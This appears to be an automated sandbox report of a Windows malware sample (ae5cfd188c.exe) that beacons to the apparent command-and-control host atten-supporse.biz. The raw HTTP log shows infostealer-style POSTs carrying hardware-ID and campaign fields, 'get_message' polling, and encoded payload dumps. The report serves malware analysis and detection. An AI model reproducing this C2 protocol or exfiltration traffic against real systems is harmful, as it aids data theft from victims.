                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 69 70 6b 57 77 6e 65 36 4c 61 67 58 64 4f 6f 63 51 67 41 31 6b 4c 42 42 4e 36 69 71 65 45 41 75 5a 5a 6a 69 4b 6b 4b 50 46 70 35 5a 48 38 64 47 5a 58 6b 76 4f 41 45 6d 65 55 33 54 51 4c 42 41 35 4e 4b 37 36 2b 70 35 41 48 34 73 57 2b 43 70 77 45 69 45 47 73 6b 59 6c 55 58 6b 71 2f 69 6f 41 6d 61 70 58 49 48 41 64 6c 45 78 67 2f 59 72 36 62 6b 43 62 43 4b 61 34 69 6c 44 7a 6c 57 64 47 31 2f 45 41 4b 62 35 72 62 73 52 64 33 6c 66 68 56 46 67 51 50 6b 44 63 32 72 69 75 6f 66 73 38 52 7a 77 72 42 47 4d 31 77 30 4d 6a 73 53 46 5a 62 6b 76 4f 67 46 67 61 42 33 42 67 54 54 52 63 6f 48 31 36 36 6c 36 41 36 38 69 47 79 4c 72 68 51 6d 56 58 4a 34 63 56 56 65 33 75 69 69 6f 46 33 54 6b 32 6b 61 46 4d 38 42 2f 67 6e 56 70 71 4c 2f 54 71 58 4b 64 63 79 75 43 6e 51 49
                                                                                                                                                                                                                                                              Data Ascii: ipkWwne6LagXdOocQgA1kLBBN6iqeEAuZZjiKkKPFp5ZH8dGZXkvOAEmeU3TQLBA5NK76+p5AH4sW+CpwEiEGskYlUXkq/ioAmapXIHAdlExg/Yr6bkCbCKa4ilDzlWdG1/EAKb5rbsRd3lfhVFgQPkDc2riuofs8RzwrBGM1w0MjsSFZbkvOgFgaB3BgTTRcoH166l6A68iGyLrhQmVXJ4cVVe3uiioF3Tk2kaFM8B/gnVpqL/TqXKdcyuCnQI
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 67 62 6b 65 53 6f 34 41 69 58 71 58 30 46 44 74 4d 44 68 55 72 63 73 4f 57 78 54 6f 2b 4a 59 34 79 71 45 48 52 50 4f 6e 4d 37 45 68 7a 65 74 2f 72 73 43 35 4f 71 64 51 45 4f 30 55 4c 48 42 4e 79 74 72 4f 45 47 71 49 56 6f 68 4b 67 49 4f 31 46 77 62 33 34 52 46 35 72 70 74 61 42 4c 30 36 4a 68 54 56 32 5a 62 4f 77 2f 6d 59 6d 66 71 52 48 30 6e 53 79 4c 70 55 5a 73 45 48 68 70 64 78 30 66 6d 4f 61 32 36 67 79 59 71 58 49 4a 43 64 42 47 7a 51 76 65 72 61 54 74 41 72 43 43 62 34 2b 6d 43 54 74 59 4e 43 51 37 45 67 6a 65 74 2f 72 46 45 70 69 72 66 30 30 61 6c 31 71 4c 44 64 66 6f 2f 61 6b 43 73 34 4a 71 69 61 55 48 4d 6c 68 78 59 6e 38 55 46 70 6a 73 74 65 51 41 6b 71 70 39 41 51 76 54 51 73 6f 47 30 4b 65 75 37 45 37 30 78 47 75 55 36 56 35 30 59 58 64 38 62
                                                                                                                                                                                                                                                              Data Ascii: gbkeSo4AiXqX0FDtMDhUrcsOWxTo+JY4yqEHRPOnM7Ehzet/rsC5OqdQEO0ULHBNytrOEGqIVohKgIO1Fwb34RF5rptaBL06JhTV2ZbOw/mYmfqRH0nSyLpUZsEHhpdx0fmOa26gyYqXIJCdBGzQveraTtArCCb4+mCTtYNCQ7Egjet/rFEpirf00al1qLDdfo/akCs4JqiaUHMlhxYn8UFpjsteQAkqp9AQvTQsoG0Keu7E70xGuU6V50YXd8b
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 6a 2b 71 35 46 6c 4c 30 35 56 55 58 33 53 4e 67 64 32 4b 61 75 2f 78 58 36 6d 79 4b 56 36 51 45 34 45 43 77 71 65 42 34 62 6d 75 2b 32 34 41 47 65 70 57 73 43 41 74 35 4b 77 42 6a 52 72 36 4c 69 42 72 47 4c 61 70 36 6c 43 43 5a 56 5a 6e 67 37 57 31 43 5a 39 2f 71 34 52 61 57 69 61 52 30 47 6d 33 4c 64 43 63 32 6a 71 4f 56 4f 70 63 70 31 7a 4b 34 4b 64 41 67 30 62 48 51 63 45 35 48 75 73 2b 77 49 6c 71 78 38 44 41 50 64 53 63 45 4b 33 61 36 6b 37 41 53 35 68 57 61 46 72 67 34 7a 55 32 59 71 4e 56 55 58 68 71 2f 69 6f 43 79 55 74 33 63 64 52 63 59 4e 30 6b 72 63 70 4f 57 78 54 72 36 4f 59 34 69 75 43 6a 4a 56 63 6d 64 36 47 68 47 65 34 4c 37 72 44 4a 57 6b 64 41 67 49 33 56 48 42 41 64 53 6b 72 4f 55 44 2b 73 6f 73 69 37 46 47 62 42 42 46 5a 33 55 62 46 34
                                                                                                                                                                                                                                                              Data Ascii: j+q5FlL05VUX3SNgd2Kau/xX6myKV6QE4ECwqeB4bmu+24AGepWsCAt5KwBjRr6LiBrGLap6lCCZVZng7W1CZ9/q4RaWiaR0Gm3LdCc2jqOVOpcp1zK4KdAg0bHQcE5Hus+wIlqx8DAPdScEK3a6k7AS5hWaFrg4zU2YqNVUXhq/ioCyUt3cdRcYN0krcpOWxTr6OY4iuCjJVcmd6GhGe4L7rDJWkdAgI3VHBAdSkrOUD+sosi7FGbBBFZ3UbF4
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 41 4a 36 6f 64 41 34 44 33 30 6a 48 47 4e 4b 6f 70 75 4a 4f 39 4d 52 72 6c 4f 6c 65 64 48 4e 6a 66 48 45 53 48 49 6a 6b 75 2b 4d 54 6e 72 55 35 51 30 58 49 52 4e 70 4b 67 37 36 31 2f 67 6d 6c 79 6e 58 4d 72 67 70 30 43 44 52 73 63 68 4d 58 6d 4f 47 6f 35 51 4f 63 71 6e 41 45 41 64 46 41 79 77 37 66 72 36 44 71 41 72 47 44 62 34 4f 74 44 7a 70 5a 65 79 6f 31 56 52 65 47 72 2b 4b 67 4a 49 69 6d 64 51 42 46 78 67 33 53 53 74 79 6b 35 62 46 4f 74 6f 70 70 6a 4b 4d 41 4d 46 56 79 59 48 34 56 47 35 33 67 76 75 59 42 6e 4b 56 79 42 41 54 66 52 73 45 42 33 61 57 6d 37 77 6a 36 79 69 79 4c 73 55 5a 73 45 46 52 78 64 68 6b 58 33 76 44 30 2b 55 57 55 71 54 6c 56 52 64 4a 50 7a 77 33 62 70 61 62 68 43 37 36 4f 61 59 79 68 46 44 78 51 63 33 68 70 46 52 6d 62 34 37 6e
                                                                                                                                                                                                                                                              Data Ascii: AJ6odA4D30jHGNKopuJO9MRrlOledHNjfHESHIjku+MTnrU5Q0XIRNpKg761/gmlynXMrgp0CDRschMXmOGo5QOcqnAEAdFAyw7fr6DqArGDb4OtDzpZeyo1VReGr+KgJIimdQBFxg3SStyk5bFOtoppjKMAMFVyYH4VG53gvuYBnKVyBATfRsEB3aWm7wj6yiyLsUZsEFRxdhkX3vD0+UWUqTlVRdJPzw3bpabhC76OaYyhFDxQc3hpFRmb47n
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 33 6f 64 42 74 5a 53 39 55 71 44 73 5a 75 70 42 61 79 44 66 49 2b 2f 44 54 6c 63 5a 56 51 37 54 55 54 4d 76 65 69 79 56 34 7a 6c 5a 6a 4a 4c 6d 55 4b 4c 55 75 4b 78 35 66 39 4f 34 74 59 69 7a 4c 74 47 62 42 41 7a 61 57 6b 48 46 70 33 35 75 61 63 37 72 59 4a 76 42 77 4c 4a 52 4e 77 46 6d 2b 62 6c 35 6b 37 69 76 53 79 46 72 68 30 6c 52 6e 6c 36 66 46 55 76 30 4b 2b 69 6f 46 33 54 6b 48 6f 44 43 39 35 56 32 6b 66 38 76 71 2f 75 48 72 32 54 59 38 7a 6e 52 6a 49 51 4c 44 6b 31 56 52 53 50 72 2b 4b 77 56 38 6a 77 4b 6c 70 56 69 31 79 46 45 35 75 2b 35 62 46 63 39 4d 52 2b 7a 50 46 47 63 31 4e 6d 65 48 30 57 42 70 32 6f 68 4e 34 69 69 61 68 2f 47 68 54 6e 66 63 77 51 31 71 36 79 2b 45 4b 76 68 32 4b 43 72 68 42 30 48 6a 52 6c 4f 30 30 70 33 71 66 36 33 30 76 54
                                                                                                                                                                                                                                                              Data Ascii: 3odBtZS9UqDsZupBayDfI+/DTlcZVQ7TUTMveiyV4zlZjJLmUKLUuKx5f9O4tYizLtGbBAzaWkHFp35uac7rYJvBwLJRNwFm+bl5k7ivSyFrh0lRnl6fFUv0K+ioF3TkHoDC95V2kf8vq/uHr2TY8znRjIQLDk1VRSPr+KwV8jwKlpVi1yFE5u+5bFc9MR+zPFGc1NmeH0WBp2ohN4iiah/GhTnfcwQ1q6y+EKvh2KCrhB0HjRlO00p3qf630vT
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 43 4b 46 4a 74 59 78 4f 61 38 71 52 6a 36 33 44 37 43 36 52 52 30 43 44 51 74 65 41 63 43 6d 4f 79 73 34 30 4b 74 6d 31 34 44 41 74 68 56 32 78 33 55 6c 70 76 38 44 62 53 4b 61 35 71 34 52 6e 6f 51 65 79 6f 6a 4c 46 44 57 72 34 57 75 52 59 76 6c 49 55 30 77 32 6b 33 46 44 63 32 35 36 4d 34 41 76 59 56 36 6e 4c 34 4a 64 42 34 30 62 44 74 4e 51 74 43 76 76 76 46 46 79 2f 55 72 56 6c 43 4b 46 4a 74 59 78 4f 61 38 71 52 6a 36 33 44 37 43 36 52 52 30 43 44 51 74 65 41 63 43 6d 4f 79 73 34 30 4b 74 6d 31 34 44 41 74 68 56 32 78 33 55 35 34 76 66 4c 34 53 36 65 59 2b 6e 43 44 4e 47 5a 53 6f 31 56 52 2f 65 74 34 4f 67 54 64 4f 61 4e 30 30 64 6d 52 75 4c 50 39 69 6d 71 2b 34 59 71 38 6c 4c 67 71 34 48 49 6b 42 6a 5a 54 51 37 4a 72 2b 76 39 4b 41 44 30 2f 30 72 51
                                                                                                                                                                                                                                                              Data Ascii: CKFJtYxOa8qRj63D7C6RR0CDQteAcCmOys40Ktm14DAthV2x3Ulpv8DbSKa5q4RnoQeyojLFDWr4WuRYvlIU0w2k3FDc256M4AvYV6nL4JdB40bDtNQtCvvvFFy/UrVlCKFJtYxOa8qRj63D7C6RR0CDQteAcCmOys40Ktm14DAthV2x3U54vfL4S6eY+nCDNGZSo1VR/et4OgTdOaN00dmRuLP9imq+4Yq8lLgq4HIkBjZTQ7Jr+v9KAD0/0rQ
                                                                                                                                                                                                                                                              2024-12-09 22:09:32 UTC1369INData Raw: 5a 44 63 75 72 35 39 67 59 75 59 52 69 69 2b 6c 49 64 45 67 30 4d 6a 73 34 41 70 6e 2f 75 61 42 4c 30 36 6b 35 56 55 58 55 55 63 77 61 32 4f 53 69 38 77 6e 36 6d 79 4b 56 36 52 42 30 43 43 63 6b 4f 77 64 51 78 71 2f 39 37 67 69 53 70 6e 63 4f 46 38 74 46 79 42 7a 59 37 35 76 58 49 36 69 44 66 49 2f 72 4e 7a 6c 55 59 6e 39 34 42 52 65 67 30 5a 66 79 41 6f 4f 6d 4f 79 45 43 31 45 2f 31 4e 4f 79 35 6f 76 6c 4d 6e 49 64 36 6a 2b 6c 49 64 45 67 30 4d 6a 73 34 41 70 6e 2f 75 61 49 70 6c 4b 68 31 54 52 71 58 57 6f 73 63 6d 2f 44 32 70 30 36 6f 78 44 54 4d 37 67 55 6d 51 6e 4a 70 62 52 5a 58 6f 4e 47 58 38 67 4b 44 70 6a 73 38 43 4e 31 56 33 67 6e 4c 72 35 76 58 49 36 69 44 66 49 2f 72 49 77 34 53 52 58 78 34 46 52 36 5a 72 2f 53 67 48 64 50 39 4f 53 41 58 33 6c
                                                                                                                                                                                                                                                              Data Ascii: ZDcur59gYuYRii+lIdEg0Mjs4Apn/uaBL06k5VUXUUcwa2OSi8wn6myKV6RB0CCckOwdQxq/97giSpncOF8tFyBzY75vXI6iDfI/rNzlUYn94BReg0ZfyAoOmOyEC1E/1NOy5ovlMnId6j+lIdEg0Mjs4Apn/uaIplKh1TRqXWoscm/D2p06oxDTM7gUmQnJpbRZXoNGX8gKDpjs8CN1V3gnLr5vXI6iDfI/rIw4SRXx4FR6Zr/SgHdP9OSAX3l


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.449842104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:34 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=478CIPIPZOWTB668KNF
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18175
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:34 UTC15331OUTData Raw: 2d 2d 34 37 38 43 49 50 49 50 5a 4f 57 54 42 36 36 38 4b 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 37 38 43 49 50 49 50 5a 4f 57 54 42 36 36 38 4b 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 37 38 43 49 50 49 50 5a 4f 57 54 42 36 36 38 4b 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                                              Data Ascii: --478CIPIPZOWTB668KNFContent-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--478CIPIPZOWTB668KNFContent-Disposition: form-data; name="pid"2--478CIPIPZOWTB668KNFContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                                              2024-12-09 22:09:34 UTC2844OUTData Raw: d2 6d b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef
                                                                                                                                                                                                                                                              Data Ascii: me,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
                                                                                                                                                                                                                                                              2024-12-09 22:09:35 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:34 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=961qns6t19jpdoa6hcljl2h0gl; expires=Fri, 04-Apr-2025 15:56:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fX4vKyA0Bd%2Bfz2fU5MmFmBycafMQnOTPlpOlVXneaRT4dsRQ6IDYBqRFE8Qc5C1k62IJVbLEhOOGigMkygtu5IwZmUwI3IbGi7cTGVl%2Bvka1VfO4djNSCQQkAoADv%2BZgGmeEzMM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851fcd9b00cc8-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1520&rtt_var=578&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19140&delivery_rate=1877813&cwnd=225&unsent_bytes=0&cid=549f96b84e1bd969&ts=995&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.449852104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:36 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=EE0SIFZN91VG0FQ
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8772
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:36 UTC8772OUTData Raw: 2d 2d 45 45 30 53 49 46 5a 4e 39 31 56 47 30 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 45 45 30 53 49 46 5a 4e 39 31 56 47 30 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 45 30 53 49 46 5a 4e 39 31 56 47 30 46 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                                                                                              Data Ascii: --EE0SIFZN91VG0FQContent-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--EE0SIFZN91VG0FQContent-Disposition: form-data; name="pid"2--EE0SIFZN91VG0FQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                                                                                              2024-12-09 22:09:37 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:37 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=sdtfd2maf8arrf0bipgl9f7ru0; expires=Fri, 04-Apr-2025 15:56:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZxampBT6gYy3PTwBdikauMXml7JYQtaa2CpXBek1rcVGbTnLSHMIFj86e4pWovowFFFonrOQIoqnvAysICH1251RfeVFImIoEwOIXxLUEmzp8u5fM4dPQvhgOop2U4ykf7qONpo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef8520debd3f797-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1693&rtt_var=641&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9710&delivery_rate=1698662&cwnd=151&unsent_bytes=0&cid=b3473a5b5daba19d&ts=942&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.2.449861104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:39 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 88
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:39 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=3A3450F0EC9224B723D904AF30EFEBBC
                                                                                                                                                                                                                                                              2024-12-09 22:09:39 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=tv1ref9e3vklveucomhl4vhl2a; expires=Fri, 04-Apr-2025 15:56:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZAgxKaImMI6L3D1btjDwXIICAjJoieSD8K%2BGQbYBOOtP1Wxm%2Fhp3wFJUFMP5TFfMzhmVB12DE3dh9d%2BTcAwziwVaDsdRhzjc%2BPkrrrZ9TjdfQM%2Fvgfiiz0ISbpsjcpUPGIdoaM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef8521d8881f797-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1643&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=990&delivery_rate=1713615&cwnd=151&unsent_bytes=0&cid=54acbd2f77489437&ts=716&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:39 UTC214INData Raw: 64 30 0d 0a 48 6a 7a 43 2f 5a 75 44 39 77 55 69 2f 51 72 5a 5a 7a 68 52 48 6d 6b 70 64 6b 37 58 65 43 53 56 7a 79 43 6c 44 6a 64 4d 52 54 4a 46 52 2b 43 49 75 62 6e 56 62 56 61 4a 65 75 4d 37 46 77 30 78 57 42 46 44 59 4f 56 4a 45 62 76 2b 45 5a 59 67 42 6e 6f 5a 48 58 46 61 70 4b 47 30 35 35 4a 6a 44 4a 68 79 76 45 55 55 63 33 67 64 43 30 78 2b 2b 31 70 42 74 2f 55 52 32 43 4a 4d 62 6a 41 51 4a 42 36 71 69 65 2f 7a 7a 56 6b 4e 6f 53 58 6f 58 77 31 2f 4c 46 67 63 57 48 2f 6d 53 77 71 6b 2b 58 79 4b 66 55 4d 70 4a 46 39 43 45 37 43 63 39 65 65 59 61 41 79 59 63 72 78 46 46 48 4e 34 48 51 74 4d 66 76 74 61 51 62 66 31 45 4e 68 54 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: d0HjzC/ZuD9wUi/QrZZzhRHmkpdk7XeCSVzyClDjdMRTJFR+CIubnVbVaJeuM7Fw0xWBFDYOVJEbv+EZYgBnoZHXFapKG055JjDJhyvEUUc3gdC0x++1pBt/UR2CJMbjAQJB6qie/zzVkNoSXoXw1/LFgcWH/mSwqk+XyKfUMpJF9CE7Cc9eeYaAyYcrxFFHN4HQtMfvtaQbf1ENhT
                                                                                                                                                                                                                                                              2024-12-09 22:09:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.2.449864104.21.48.14433512C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:40 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=G2J1AFOFIYSJEI5872M
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20449
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
